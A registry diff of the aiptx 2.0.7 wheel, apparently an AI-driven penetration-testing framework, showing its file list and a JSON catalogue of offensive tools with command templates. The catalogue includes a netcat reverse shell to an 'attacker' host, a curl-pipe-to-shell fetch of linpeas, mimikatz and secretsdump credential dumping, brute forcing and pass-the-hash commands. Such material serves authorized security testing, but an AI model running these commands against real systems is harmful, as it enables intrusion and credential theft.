aiptx 2.0.7__py3-none-any.whl

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (187) hide show
  1. aipt_v2/__init__.py +110 -0
  2. aipt_v2/__main__.py +24 -0
  3. aipt_v2/agents/AIPTxAgent/__init__.py +10 -0
  4. aipt_v2/agents/AIPTxAgent/aiptx_agent.py +211 -0
  5. aipt_v2/agents/__init__.py +46 -0
  6. aipt_v2/agents/base.py +520 -0
  7. aipt_v2/agents/exploit_agent.py +688 -0
  8. aipt_v2/agents/ptt.py +406 -0
  9. aipt_v2/agents/state.py +168 -0
  10. aipt_v2/app.py +957 -0
  11. aipt_v2/browser/__init__.py +31 -0
  12. aipt_v2/browser/automation.py +458 -0
  13. aipt_v2/browser/crawler.py +453 -0
  14. aipt_v2/cli.py +2933 -0
  15. aipt_v2/compliance/__init__.py +71 -0
  16. aipt_v2/compliance/compliance_report.py +449 -0
  17. aipt_v2/compliance/framework_mapper.py +424 -0
  18. aipt_v2/compliance/nist_mapping.py +345 -0
  19. aipt_v2/compliance/owasp_mapping.py +330 -0
  20. aipt_v2/compliance/pci_mapping.py +297 -0
  21. aipt_v2/config.py +341 -0
  22. aipt_v2/core/__init__.py +43 -0
  23. aipt_v2/core/agent.py +630 -0
  24. aipt_v2/core/llm.py +395 -0
  25. aipt_v2/core/memory.py +305 -0
  26. aipt_v2/core/ptt.py +329 -0
  27. aipt_v2/database/__init__.py +14 -0
  28. aipt_v2/database/models.py +232 -0
  29. aipt_v2/database/repository.py +384 -0
  30. aipt_v2/docker/__init__.py +23 -0
  31. aipt_v2/docker/builder.py +260 -0
  32. aipt_v2/docker/manager.py +222 -0
  33. aipt_v2/docker/sandbox.py +371 -0
  34. aipt_v2/evasion/__init__.py +58 -0
  35. aipt_v2/evasion/request_obfuscator.py +272 -0
  36. aipt_v2/evasion/tls_fingerprint.py +285 -0
  37. aipt_v2/evasion/ua_rotator.py +301 -0
  38. aipt_v2/evasion/waf_bypass.py +439 -0
  39. aipt_v2/execution/__init__.py +23 -0
  40. aipt_v2/execution/executor.py +302 -0
  41. aipt_v2/execution/parser.py +544 -0
  42. aipt_v2/execution/terminal.py +337 -0
  43. aipt_v2/health.py +437 -0
  44. aipt_v2/intelligence/__init__.py +194 -0
  45. aipt_v2/intelligence/adaptation.py +474 -0
  46. aipt_v2/intelligence/auth.py +520 -0
  47. aipt_v2/intelligence/chaining.py +775 -0
  48. aipt_v2/intelligence/correlation.py +536 -0
  49. aipt_v2/intelligence/cve_aipt.py +334 -0
  50. aipt_v2/intelligence/cve_info.py +1111 -0
  51. aipt_v2/intelligence/knowledge_graph.py +590 -0
  52. aipt_v2/intelligence/learning.py +626 -0
  53. aipt_v2/intelligence/llm_analyzer.py +502 -0
  54. aipt_v2/intelligence/llm_tool_selector.py +518 -0
  55. aipt_v2/intelligence/payload_generator.py +562 -0
  56. aipt_v2/intelligence/rag.py +239 -0
  57. aipt_v2/intelligence/scope.py +442 -0
  58. aipt_v2/intelligence/searchers/__init__.py +5 -0
  59. aipt_v2/intelligence/searchers/exploitdb_searcher.py +523 -0
  60. aipt_v2/intelligence/searchers/github_searcher.py +467 -0
  61. aipt_v2/intelligence/searchers/google_searcher.py +281 -0
  62. aipt_v2/intelligence/tools.json +443 -0
  63. aipt_v2/intelligence/triage.py +670 -0
  64. aipt_v2/interactive_shell.py +559 -0
  65. aipt_v2/interface/__init__.py +5 -0
  66. aipt_v2/interface/cli.py +230 -0
  67. aipt_v2/interface/main.py +501 -0
  68. aipt_v2/interface/tui.py +1276 -0
  69. aipt_v2/interface/utils.py +583 -0
  70. aipt_v2/llm/__init__.py +39 -0
  71. aipt_v2/llm/config.py +26 -0
  72. aipt_v2/llm/llm.py +514 -0
  73. aipt_v2/llm/memory.py +214 -0
  74. aipt_v2/llm/request_queue.py +89 -0
  75. aipt_v2/llm/utils.py +89 -0
  76. aipt_v2/local_tool_installer.py +1467 -0
  77. aipt_v2/models/__init__.py +15 -0
  78. aipt_v2/models/findings.py +295 -0
  79. aipt_v2/models/phase_result.py +224 -0
  80. aipt_v2/models/scan_config.py +207 -0
  81. aipt_v2/monitoring/grafana/dashboards/aipt-dashboard.json +355 -0
  82. aipt_v2/monitoring/grafana/dashboards/default.yml +17 -0
  83. aipt_v2/monitoring/grafana/datasources/prometheus.yml +17 -0
  84. aipt_v2/monitoring/prometheus.yml +60 -0
  85. aipt_v2/orchestration/__init__.py +52 -0
  86. aipt_v2/orchestration/pipeline.py +398 -0
  87. aipt_v2/orchestration/progress.py +300 -0
  88. aipt_v2/orchestration/scheduler.py +296 -0
  89. aipt_v2/orchestrator.py +2427 -0
  90. aipt_v2/payloads/__init__.py +27 -0
  91. aipt_v2/payloads/cmdi.py +150 -0
  92. aipt_v2/payloads/sqli.py +263 -0
  93. aipt_v2/payloads/ssrf.py +204 -0
  94. aipt_v2/payloads/templates.py +222 -0
  95. aipt_v2/payloads/traversal.py +166 -0
  96. aipt_v2/payloads/xss.py +204 -0
  97. aipt_v2/prompts/__init__.py +60 -0
  98. aipt_v2/proxy/__init__.py +29 -0
  99. aipt_v2/proxy/history.py +352 -0
  100. aipt_v2/proxy/interceptor.py +452 -0
  101. aipt_v2/recon/__init__.py +44 -0
  102. aipt_v2/recon/dns.py +241 -0
  103. aipt_v2/recon/osint.py +367 -0
  104. aipt_v2/recon/subdomain.py +372 -0
  105. aipt_v2/recon/tech_detect.py +311 -0
  106. aipt_v2/reports/__init__.py +17 -0
  107. aipt_v2/reports/generator.py +313 -0
  108. aipt_v2/reports/html_report.py +378 -0
  109. aipt_v2/runtime/__init__.py +53 -0
  110. aipt_v2/runtime/base.py +30 -0
  111. aipt_v2/runtime/docker.py +401 -0
  112. aipt_v2/runtime/local.py +346 -0
  113. aipt_v2/runtime/tool_server.py +205 -0
  114. aipt_v2/runtime/vps.py +830 -0
  115. aipt_v2/scanners/__init__.py +28 -0
  116. aipt_v2/scanners/base.py +273 -0
  117. aipt_v2/scanners/nikto.py +244 -0
  118. aipt_v2/scanners/nmap.py +402 -0
  119. aipt_v2/scanners/nuclei.py +273 -0
  120. aipt_v2/scanners/web.py +454 -0
  121. aipt_v2/scripts/security_audit.py +366 -0
  122. aipt_v2/setup_wizard.py +941 -0
  123. aipt_v2/skills/__init__.py +80 -0
  124. aipt_v2/skills/agents/__init__.py +14 -0
  125. aipt_v2/skills/agents/api_tester.py +706 -0
  126. aipt_v2/skills/agents/base.py +477 -0
  127. aipt_v2/skills/agents/code_review.py +459 -0
  128. aipt_v2/skills/agents/security_agent.py +336 -0
  129. aipt_v2/skills/agents/web_pentest.py +818 -0
  130. aipt_v2/skills/prompts/__init__.py +647 -0
  131. aipt_v2/system_detector.py +539 -0
  132. aipt_v2/telemetry/__init__.py +7 -0
  133. aipt_v2/telemetry/tracer.py +347 -0
  134. aipt_v2/terminal/__init__.py +28 -0
  135. aipt_v2/terminal/executor.py +400 -0
  136. aipt_v2/terminal/sandbox.py +350 -0
  137. aipt_v2/tools/__init__.py +44 -0
  138. aipt_v2/tools/active_directory/__init__.py +78 -0
  139. aipt_v2/tools/active_directory/ad_config.py +238 -0
  140. aipt_v2/tools/active_directory/bloodhound_wrapper.py +447 -0
  141. aipt_v2/tools/active_directory/kerberos_attacks.py +430 -0
  142. aipt_v2/tools/active_directory/ldap_enum.py +533 -0
  143. aipt_v2/tools/active_directory/smb_attacks.py +505 -0
  144. aipt_v2/tools/agents_graph/__init__.py +19 -0
  145. aipt_v2/tools/agents_graph/agents_graph_actions.py +69 -0
  146. aipt_v2/tools/api_security/__init__.py +76 -0
  147. aipt_v2/tools/api_security/api_discovery.py +608 -0
  148. aipt_v2/tools/api_security/graphql_scanner.py +622 -0
  149. aipt_v2/tools/api_security/jwt_analyzer.py +577 -0
  150. aipt_v2/tools/api_security/openapi_fuzzer.py +761 -0
  151. aipt_v2/tools/browser/__init__.py +5 -0
  152. aipt_v2/tools/browser/browser_actions.py +238 -0
  153. aipt_v2/tools/browser/browser_instance.py +535 -0
  154. aipt_v2/tools/browser/tab_manager.py +344 -0
  155. aipt_v2/tools/cloud/__init__.py +70 -0
  156. aipt_v2/tools/cloud/cloud_config.py +273 -0
  157. aipt_v2/tools/cloud/cloud_scanner.py +639 -0
  158. aipt_v2/tools/cloud/prowler_tool.py +571 -0
  159. aipt_v2/tools/cloud/scoutsuite_tool.py +359 -0
  160. aipt_v2/tools/executor.py +307 -0
  161. aipt_v2/tools/parser.py +408 -0
  162. aipt_v2/tools/proxy/__init__.py +5 -0
  163. aipt_v2/tools/proxy/proxy_actions.py +103 -0
  164. aipt_v2/tools/proxy/proxy_manager.py +789 -0
  165. aipt_v2/tools/registry.py +196 -0
  166. aipt_v2/tools/scanners/__init__.py +343 -0
  167. aipt_v2/tools/scanners/acunetix_tool.py +712 -0
  168. aipt_v2/tools/scanners/burp_tool.py +631 -0
  169. aipt_v2/tools/scanners/config.py +156 -0
  170. aipt_v2/tools/scanners/nessus_tool.py +588 -0
  171. aipt_v2/tools/scanners/zap_tool.py +612 -0
  172. aipt_v2/tools/terminal/__init__.py +5 -0
  173. aipt_v2/tools/terminal/terminal_actions.py +37 -0
  174. aipt_v2/tools/terminal/terminal_manager.py +153 -0
  175. aipt_v2/tools/terminal/terminal_session.py +449 -0
  176. aipt_v2/tools/tool_processing.py +108 -0
  177. aipt_v2/utils/__init__.py +17 -0
  178. aipt_v2/utils/logging.py +202 -0
  179. aipt_v2/utils/model_manager.py +187 -0
  180. aipt_v2/utils/searchers/__init__.py +269 -0
  181. aipt_v2/verify_install.py +793 -0
  182. aiptx-2.0.7.dist-info/METADATA +345 -0
  183. aiptx-2.0.7.dist-info/RECORD +187 -0
  184. aiptx-2.0.7.dist-info/WHEEL +5 -0
  185. aiptx-2.0.7.dist-info/entry_points.txt +7 -0
  186. aiptx-2.0.7.dist-info/licenses/LICENSE +21 -0
  187. aiptx-2.0.7.dist-info/top_level.txt +1 -0
@@ -0,0 +1,443 @@
1
+ [
2
+ {
3
+ "name": "nmap",
4
+ "description": "Network exploration and security auditing tool. Discovers hosts, open ports, services, and OS detection.",
5
+ "cmd": "nmap -sV -sC -oN nmap_scan.txt {target}",
6
+ "keywords": ["port", "scan", "service", "network", "discovery", "host", "tcp", "udp"],
7
+ "samples": ["nmap -sV 192.168.1.1", "nmap -p- --min-rate=1000 target.com", "nmap -sU -sV 10.0.0.1"],
8
+ "phase": "recon",
9
+ "timeout": 600
10
+ },
11
+ {
12
+ "name": "masscan",
13
+ "description": "Fast TCP port scanner. Scans entire internet in minutes. Best for large network ranges.",
14
+ "cmd": "masscan {target} -p1-65535 --rate=1000 -oL masscan_results.txt",
15
+ "keywords": ["fast", "port", "scan", "mass", "range", "tcp"],
16
+ "samples": ["masscan 10.0.0.0/8 -p80,443", "masscan 192.168.1.0/24 --rate=10000"],
17
+ "phase": "recon",
18
+ "timeout": 300
19
+ },
20
+ {
21
+ "name": "subfinder",
22
+ "description": "Subdomain discovery tool. Finds subdomains using passive sources like DNS, certificates.",
23
+ "cmd": "subfinder -d {target} -o subdomains.txt",
24
+ "keywords": ["subdomain", "dns", "domain", "discovery", "passive", "enumeration"],
25
+ "samples": ["subfinder -d example.com", "subfinder -d target.com -all"],
26
+ "phase": "recon",
27
+ "timeout": 300
28
+ },
29
+ {
30
+ "name": "httpx",
31
+ "description": "Fast HTTP toolkit. Probes for web servers, extracts titles, status codes, tech stack.",
32
+ "cmd": "httpx -l {target} -status-code -title -tech-detect -o httpx_results.txt",
33
+ "keywords": ["http", "web", "probe", "status", "title", "technology"],
34
+ "samples": ["cat domains.txt | httpx -status-code", "httpx -u https://target.com -tech-detect"],
35
+ "phase": "recon",
36
+ "timeout": 300
37
+ },
38
+ {
39
+ "name": "whatweb",
40
+ "description": "Web fingerprinting tool. Identifies CMS, frameworks, server software, and plugins.",
41
+ "cmd": "whatweb -v {target}",
42
+ "keywords": ["fingerprint", "cms", "technology", "wordpress", "framework", "web"],
43
+ "samples": ["whatweb https://target.com", "whatweb -a 3 target.com"],
44
+ "phase": "recon",
45
+ "timeout": 120
46
+ },
47
+ {
48
+ "name": "amass",
49
+ "description": "In-depth attack surface mapping and asset discovery. Subdomain enum with multiple sources.",
50
+ "cmd": "amass enum -d {target} -o amass_results.txt",
51
+ "keywords": ["subdomain", "asset", "discovery", "dns", "attack surface"],
52
+ "samples": ["amass enum -d example.com", "amass enum -brute -d target.com"],
53
+ "phase": "recon",
54
+ "timeout": 600
55
+ },
56
+ {
57
+ "name": "theHarvester",
58
+ "description": "Gather emails, names, subdomains, IPs from public sources. OSINT tool.",
59
+ "cmd": "theHarvester -d {target} -b all",
60
+ "keywords": ["email", "osint", "harvest", "names", "linkedin", "google"],
61
+ "samples": ["theHarvester -d company.com -b google", "theHarvester -d target.com -b linkedin"],
62
+ "phase": "recon",
63
+ "timeout": 300
64
+ },
65
+ {
66
+ "name": "dnsrecon",
67
+ "description": "DNS enumeration tool. Zone transfers, brute force, cache snooping.",
68
+ "cmd": "dnsrecon -d {target}",
69
+ "keywords": ["dns", "zone transfer", "enumeration", "records", "mx", "ns"],
70
+ "samples": ["dnsrecon -d example.com -t axfr", "dnsrecon -d target.com -t brt"],
71
+ "phase": "recon",
72
+ "timeout": 180
73
+ },
74
+ {
75
+ "name": "shodan",
76
+ "description": "Search engine for internet-connected devices. Find exposed services and vulnerabilities.",
77
+ "cmd": "shodan search hostname:{target}",
78
+ "keywords": ["shodan", "iot", "exposed", "internet", "devices", "search"],
79
+ "samples": ["shodan host 1.2.3.4", "shodan search 'apache port:80'"],
80
+ "phase": "recon",
81
+ "timeout": 60
82
+ },
83
+ {
84
+ "name": "wafw00f",
85
+ "description": "Web Application Firewall detection tool. Identifies WAF/IPS protecting targets.",
86
+ "cmd": "wafw00f {target}",
87
+ "keywords": ["waf", "firewall", "detection", "bypass", "protection"],
88
+ "samples": ["wafw00f https://target.com", "wafw00f -a target.com"],
89
+ "phase": "recon",
90
+ "timeout": 60
91
+ },
92
+ {
93
+ "name": "gobuster",
94
+ "description": "Directory and file brute-forcing tool. Discovers hidden paths and files on web servers.",
95
+ "cmd": "gobuster dir -u {target} -w /usr/share/wordlists/dirb/common.txt -o gobuster_results.txt",
96
+ "keywords": ["directory", "brute", "fuzz", "path", "files", "hidden", "web"],
97
+ "samples": ["gobuster dir -u http://target.com -w wordlist.txt", "gobuster dns -d example.com -w subdomains.txt"],
98
+ "phase": "enum",
99
+ "timeout": 600
100
+ },
101
+ {
102
+ "name": "ffuf",
103
+ "description": "Fast web fuzzer. Directory discovery, parameter fuzzing, virtual host enumeration.",
104
+ "cmd": "ffuf -u {target}/FUZZ -w /usr/share/wordlists/dirb/common.txt -o ffuf_results.json -of json",
105
+ "keywords": ["fuzz", "directory", "parameter", "brute", "web", "vhost"],
106
+ "samples": ["ffuf -u http://target.com/FUZZ -w wordlist.txt", "ffuf -u http://target.com?id=FUZZ -w numbers.txt"],
107
+ "phase": "enum",
108
+ "timeout": 600
109
+ },
110
+ {
111
+ "name": "nikto",
112
+ "description": "Web server vulnerability scanner. Checks for dangerous files, outdated software, misconfigs.",
113
+ "cmd": "nikto -h {target} -o nikto_results.txt",
114
+ "keywords": ["vulnerability", "web", "scanner", "misconfig", "cgi", "outdated"],
115
+ "samples": ["nikto -h http://target.com", "nikto -h target.com -p 8080"],
116
+ "phase": "enum",
117
+ "timeout": 600
118
+ },
119
+ {
120
+ "name": "nuclei",
121
+ "description": "Fast vulnerability scanner using templates. CVE detection, misconfigs, exposures.",
122
+ "cmd": "nuclei -u {target} -t cves/ -o nuclei_results.txt",
123
+ "keywords": ["cve", "vulnerability", "template", "scanner", "nuclei", "exploit"],
124
+ "samples": ["nuclei -u https://target.com -t cves/", "nuclei -l urls.txt -t misconfiguration/"],
125
+ "phase": "enum",
126
+ "timeout": 600
127
+ },
128
+ {
129
+ "name": "enum4linux",
130
+ "description": "Windows/Samba enumeration tool. Users, shares, groups, password policy.",
131
+ "cmd": "enum4linux -a {target}",
132
+ "keywords": ["smb", "windows", "shares", "users", "samba", "netbios", "enum"],
133
+ "samples": ["enum4linux -a 192.168.1.10", "enum4linux -U -S target"],
134
+ "phase": "enum",
135
+ "timeout": 300
136
+ },
137
+ {
138
+ "name": "smbclient",
139
+ "description": "SMB/CIFS client. List and access Windows shares.",
140
+ "cmd": "smbclient -L //{target} -N",
141
+ "keywords": ["smb", "shares", "windows", "cifs", "files"],
142
+ "samples": ["smbclient -L //192.168.1.10 -N", "smbclient //target/share -U user"],
143
+ "phase": "enum",
144
+ "timeout": 60
145
+ },
146
+ {
147
+ "name": "ldapsearch",
148
+ "description": "LDAP enumeration. Query Active Directory for users, groups, computers.",
149
+ "cmd": "ldapsearch -x -H ldap://{target} -b 'dc=domain,dc=com'",
150
+ "keywords": ["ldap", "active directory", "users", "groups", "ad", "domain"],
151
+ "samples": ["ldapsearch -x -H ldap://dc.target.com -b 'dc=target,dc=com'"],
152
+ "phase": "enum",
153
+ "timeout": 120
154
+ },
155
+ {
156
+ "name": "rpcclient",
157
+ "description": "RPC client for Windows. Enumerate users, groups, shares via RPC.",
158
+ "cmd": "rpcclient -U '' -N {target}",
159
+ "keywords": ["rpc", "windows", "users", "enumeration", "null session"],
160
+ "samples": ["rpcclient -U '' -N 192.168.1.10 -c 'enumdomusers'"],
161
+ "phase": "enum",
162
+ "timeout": 60
163
+ },
164
+ {
165
+ "name": "snmpwalk",
166
+ "description": "SNMP enumeration tool. Walk MIB tree to discover system information.",
167
+ "cmd": "snmpwalk -v2c -c public {target}",
168
+ "keywords": ["snmp", "mib", "community", "network", "enumeration"],
169
+ "samples": ["snmpwalk -v2c -c public 192.168.1.1", "snmpwalk -v3 target"],
170
+ "phase": "enum",
171
+ "timeout": 180
172
+ },
173
+ {
174
+ "name": "wpscan",
175
+ "description": "WordPress vulnerability scanner. Plugins, themes, users, vulnerabilities.",
176
+ "cmd": "wpscan --url {target} --enumerate vp,vt,u",
177
+ "keywords": ["wordpress", "cms", "plugin", "vulnerability", "wp"],
178
+ "samples": ["wpscan --url https://target.com", "wpscan --url target.com --api-token TOKEN"],
179
+ "phase": "enum",
180
+ "timeout": 300
181
+ },
182
+ {
183
+ "name": "sqlmap",
184
+ "description": "Automatic SQL injection tool. Detects and exploits SQL injection vulnerabilities.",
185
+ "cmd": "sqlmap -u '{target}' --batch --dbs",
186
+ "keywords": ["sql", "injection", "database", "sqli", "exploit", "dump"],
187
+ "samples": ["sqlmap -u 'http://target.com?id=1' --dbs", "sqlmap -r request.txt --dump"],
188
+ "phase": "exploit",
189
+ "timeout": 600
190
+ },
191
+ {
192
+ "name": "hydra",
193
+ "description": "Password brute-forcing tool. Supports SSH, FTP, HTTP, SMB, and many protocols.",
194
+ "cmd": "hydra -L users.txt -P passwords.txt {target} ssh",
195
+ "keywords": ["brute", "password", "login", "ssh", "ftp", "http", "crack"],
196
+ "samples": ["hydra -l admin -P rockyou.txt ssh://target", "hydra -L users.txt -P pass.txt target http-post-form"],
197
+ "phase": "exploit",
198
+ "timeout": 600
199
+ },
200
+ {
201
+ "name": "metasploit",
202
+ "description": "Exploitation framework. Thousands of exploits, payloads, post-exploitation modules.",
203
+ "cmd": "msfconsole -q -x 'search {target}; exit'",
204
+ "keywords": ["exploit", "payload", "shell", "meterpreter", "msf", "reverse"],
205
+ "samples": ["msfconsole -x 'use exploit/windows/smb/ms17_010_eternalblue'", "msfvenom -p windows/meterpreter/reverse_tcp"],
206
+ "phase": "exploit",
207
+ "timeout": 300
208
+ },
209
+ {
210
+ "name": "searchsploit",
211
+ "description": "Exploit-DB search tool. Find public exploits for known vulnerabilities.",
212
+ "cmd": "searchsploit {target}",
213
+ "keywords": ["exploit", "exploitdb", "cve", "search", "poc"],
214
+ "samples": ["searchsploit apache 2.4", "searchsploit -m 12345"],
215
+ "phase": "exploit",
216
+ "timeout": 30
217
+ },
218
+ {
219
+ "name": "crackmapexec",
220
+ "description": "Swiss army knife for Windows/AD. SMB, WinRM, MSSQL exploitation.",
221
+ "cmd": "crackmapexec smb {target} -u user -p password",
222
+ "keywords": ["smb", "windows", "ad", "lateral", "cme", "winrm", "pass the hash"],
223
+ "samples": ["cme smb 192.168.1.0/24 -u admin -p password", "cme smb target -u user -H hash"],
224
+ "phase": "exploit",
225
+ "timeout": 300
226
+ },
227
+ {
228
+ "name": "impacket-psexec",
229
+ "description": "Remote command execution on Windows via SMB. Requires valid credentials.",
230
+ "cmd": "impacket-psexec {target} -hashes :HASH",
231
+ "keywords": ["psexec", "windows", "remote", "smb", "admin", "shell"],
232
+ "samples": ["psexec.py domain/user:password@target", "psexec.py -hashes :hash user@target"],
233
+ "phase": "exploit",
234
+ "timeout": 120
235
+ },
236
+ {
237
+ "name": "evil-winrm",
238
+ "description": "WinRM shell. Remote PowerShell access to Windows targets.",
239
+ "cmd": "evil-winrm -i {target} -u user -p password",
240
+ "keywords": ["winrm", "powershell", "windows", "shell", "remote"],
241
+ "samples": ["evil-winrm -i 192.168.1.10 -u admin -p pass", "evil-winrm -i target -u user -H hash"],
242
+ "phase": "exploit",
243
+ "timeout": 120
244
+ },
245
+ {
246
+ "name": "john",
247
+ "description": "Password cracker. Cracks hashes from various formats.",
248
+ "cmd": "john --wordlist=/usr/share/wordlists/rockyou.txt {target}",
249
+ "keywords": ["crack", "hash", "password", "brute", "john"],
250
+ "samples": ["john --format=raw-md5 hashes.txt", "john --wordlist=rockyou.txt shadow"],
251
+ "phase": "exploit",
252
+ "timeout": 600
253
+ },
254
+ {
255
+ "name": "hashcat",
256
+ "description": "Advanced GPU-based password cracker. Fastest hash cracking tool.",
257
+ "cmd": "hashcat -m 0 {target} /usr/share/wordlists/rockyou.txt",
258
+ "keywords": ["crack", "hash", "gpu", "password", "brute"],
259
+ "samples": ["hashcat -m 1000 hashes.txt rockyou.txt", "hashcat -m 500 -a 3 hashes.txt ?a?a?a?a"],
260
+ "phase": "exploit",
261
+ "timeout": 600
262
+ },
263
+ {
264
+ "name": "responder",
265
+ "description": "LLMNR/NBT-NS/MDNS poisoner. Capture NTLMv2 hashes on the network.",
266
+ "cmd": "responder -I eth0 -wrf",
267
+ "keywords": ["llmnr", "nbns", "poison", "ntlm", "hash", "mitm"],
268
+ "samples": ["responder -I eth0", "responder -I eth0 -wrf"],
269
+ "phase": "exploit",
270
+ "timeout": 600
271
+ },
272
+ {
273
+ "name": "commix",
274
+ "description": "Command injection exploitation tool. Detects and exploits command injection.",
275
+ "cmd": "commix -u '{target}'",
276
+ "keywords": ["command", "injection", "rce", "os", "shell"],
277
+ "samples": ["commix -u 'http://target.com?cmd=id'", "commix --url=target --data='input=test'"],
278
+ "phase": "exploit",
279
+ "timeout": 300
280
+ },
281
+ {
282
+ "name": "xsstrike",
283
+ "description": "Advanced XSS detection and exploitation tool.",
284
+ "cmd": "xsstrike -u '{target}'",
285
+ "keywords": ["xss", "cross-site", "scripting", "web", "injection"],
286
+ "samples": ["xsstrike -u 'http://target.com?q=test'", "xsstrike --crawl -u target.com"],
287
+ "phase": "exploit",
288
+ "timeout": 300
289
+ },
290
+ {
291
+ "name": "burpsuite",
292
+ "description": "Web application security testing platform. Proxy, scanner, intruder.",
293
+ "cmd": "burpsuite",
294
+ "keywords": ["web", "proxy", "scanner", "intercept", "burp"],
295
+ "samples": ["Launch Burp Suite and configure browser proxy"],
296
+ "phase": "exploit",
297
+ "timeout": 0
298
+ },
299
+ {
300
+ "name": "netcat",
301
+ "description": "Network utility for connections. Reverse shells, port scanning, file transfer.",
302
+ "cmd": "nc -lvnp 4444",
303
+ "keywords": ["netcat", "nc", "reverse", "shell", "listen", "connect"],
304
+ "samples": ["nc -lvnp 4444", "nc target 80", "nc -e /bin/bash attacker 4444"],
305
+ "phase": "exploit",
306
+ "timeout": 600
307
+ },
308
+ {
309
+ "name": "chisel",
310
+ "description": "TCP/UDP tunnel over HTTP. Bypass firewalls, pivot through networks.",
311
+ "cmd": "chisel server -p 8080 --reverse",
312
+ "keywords": ["tunnel", "pivot", "proxy", "firewall", "bypass"],
313
+ "samples": ["chisel server -p 8080 --reverse", "chisel client server:8080 R:socks"],
314
+ "phase": "exploit",
315
+ "timeout": 600
316
+ },
317
+ {
318
+ "name": "linpeas",
319
+ "description": "Linux privilege escalation checker. Finds misconfigs, SUID, creds, paths to root.",
320
+ "cmd": "curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh",
321
+ "keywords": ["privesc", "linux", "suid", "root", "escalation", "enumeration"],
322
+ "samples": ["./linpeas.sh", "curl linpeas.sh | sh"],
323
+ "phase": "post",
324
+ "timeout": 300
325
+ },
326
+ {
327
+ "name": "winpeas",
328
+ "description": "Windows privilege escalation checker. Services, tokens, creds, paths to SYSTEM.",
329
+ "cmd": "winpeas.exe",
330
+ "keywords": ["privesc", "windows", "system", "escalation", "enumeration"],
331
+ "samples": ["winpeas.exe", "winpeas.exe quiet"],
332
+ "phase": "post",
333
+ "timeout": 300
334
+ },
335
+ {
336
+ "name": "pspy",
337
+ "description": "Linux process monitor without root. Detect cron jobs, scheduled tasks.",
338
+ "cmd": "./pspy64",
339
+ "keywords": ["process", "cron", "monitor", "linux", "privesc"],
340
+ "samples": ["./pspy64", "./pspy32 -pf -i 1000"],
341
+ "phase": "post",
342
+ "timeout": 300
343
+ },
344
+ {
345
+ "name": "mimikatz",
346
+ "description": "Windows credential extraction. Dump passwords, hashes, Kerberos tickets.",
347
+ "cmd": "mimikatz.exe 'privilege::debug' 'sekurlsa::logonpasswords' 'exit'",
348
+ "keywords": ["credential", "dump", "password", "hash", "kerberos", "windows"],
349
+ "samples": ["mimikatz 'sekurlsa::logonpasswords'", "mimikatz 'lsadump::sam'"],
350
+ "phase": "post",
351
+ "timeout": 60
352
+ },
353
+ {
354
+ "name": "bloodhound",
355
+ "description": "Active Directory attack path finder. Visualize paths to Domain Admin.",
356
+ "cmd": "bloodhound-python -u user -p password -d domain.com -c all",
357
+ "keywords": ["active directory", "ad", "bloodhound", "domain", "attack path"],
358
+ "samples": ["bloodhound-python -c all -d domain.com", "SharpHound.exe -c all"],
359
+ "phase": "post",
360
+ "timeout": 300
361
+ },
362
+ {
363
+ "name": "rubeus",
364
+ "description": "Kerberos attack toolkit. Kerberoasting, AS-REP roasting, ticket manipulation.",
365
+ "cmd": "Rubeus.exe kerberoast",
366
+ "keywords": ["kerberos", "kerberoast", "ticket", "ad", "tgt", "tgs"],
367
+ "samples": ["Rubeus.exe kerberoast", "Rubeus.exe asreproast"],
368
+ "phase": "post",
369
+ "timeout": 120
370
+ },
371
+ {
372
+ "name": "secretsdump",
373
+ "description": "Impacket tool to dump SAM, LSA secrets, cached creds from Windows.",
374
+ "cmd": "impacket-secretsdump {target}",
375
+ "keywords": ["dump", "sam", "secrets", "hash", "ntds", "dcsync"],
376
+ "samples": ["secretsdump.py domain/user:pass@dc", "secretsdump.py -hashes :hash user@target"],
377
+ "phase": "post",
378
+ "timeout": 120
379
+ },
380
+ {
381
+ "name": "lazagne",
382
+ "description": "Credential recovery tool. Extracts passwords from browsers, mail, wifi, etc.",
383
+ "cmd": "lazagne.exe all",
384
+ "keywords": ["credential", "browser", "password", "wifi", "recovery"],
385
+ "samples": ["lazagne.exe all", "python laZagne.py all"],
386
+ "phase": "post",
387
+ "timeout": 120
388
+ },
389
+ {
390
+ "name": "sshuttle",
391
+ "description": "Transparent proxy/VPN over SSH. Pivot through compromised hosts.",
392
+ "cmd": "sshuttle -r user@{target} 10.0.0.0/8",
393
+ "keywords": ["vpn", "pivot", "ssh", "tunnel", "proxy"],
394
+ "samples": ["sshuttle -r user@pivot 10.0.0.0/8", "sshuttle -r root@target 0/0"],
395
+ "phase": "post",
396
+ "timeout": 600
397
+ },
398
+ {
399
+ "name": "proxychains",
400
+ "description": "Force connections through proxy. Chain tools through SOCKS/HTTP proxies.",
401
+ "cmd": "proxychains nmap -sT {target}",
402
+ "keywords": ["proxy", "socks", "chain", "pivot", "tunnel"],
403
+ "samples": ["proxychains nmap -sT 10.0.0.1", "proxychains curl target"],
404
+ "phase": "post",
405
+ "timeout": 300
406
+ },
407
+ {
408
+ "name": "ligolo-ng",
409
+ "description": "Advanced tunneling tool. Create tunnels for pivoting without needing SOCKS.",
410
+ "cmd": "ligolo-ng -selfcert",
411
+ "keywords": ["tunnel", "pivot", "ligolo", "network"],
412
+ "samples": ["./proxy -selfcert", "./agent -connect attacker:11601"],
413
+ "phase": "post",
414
+ "timeout": 600
415
+ },
416
+ {
417
+ "name": "trivy",
418
+ "description": "Vulnerability scanner for containers, filesystems, git repos. CVE detection.",
419
+ "cmd": "trivy image {target}",
420
+ "keywords": ["container", "docker", "vulnerability", "cve", "sbom", "scan"],
421
+ "samples": ["trivy image nginx:latest", "trivy fs ./app", "trivy repo github.com/user/repo"],
422
+ "phase": "recon",
423
+ "timeout": 300
424
+ },
425
+ {
426
+ "name": "trufflehog",
427
+ "description": "Secret scanner. Finds credentials, API keys in git repos and filesystems.",
428
+ "cmd": "trufflehog git {target}",
429
+ "keywords": ["secret", "credential", "api key", "git", "leak"],
430
+ "samples": ["trufflehog git https://github.com/user/repo", "trufflehog filesystem /path"],
431
+ "phase": "recon",
432
+ "timeout": 300
433
+ },
434
+ {
435
+ "name": "gitleaks",
436
+ "description": "Git secret scanner. Detect hardcoded secrets in git history.",
437
+ "cmd": "gitleaks detect --source {target}",
438
+ "keywords": ["secret", "git", "credential", "leak", "history"],
439
+ "samples": ["gitleaks detect --source .", "gitleaks detect --source /repo --report-path report.json"],
440
+ "phase": "recon",
441
+ "timeout": 300
442
+ }
443
+ ]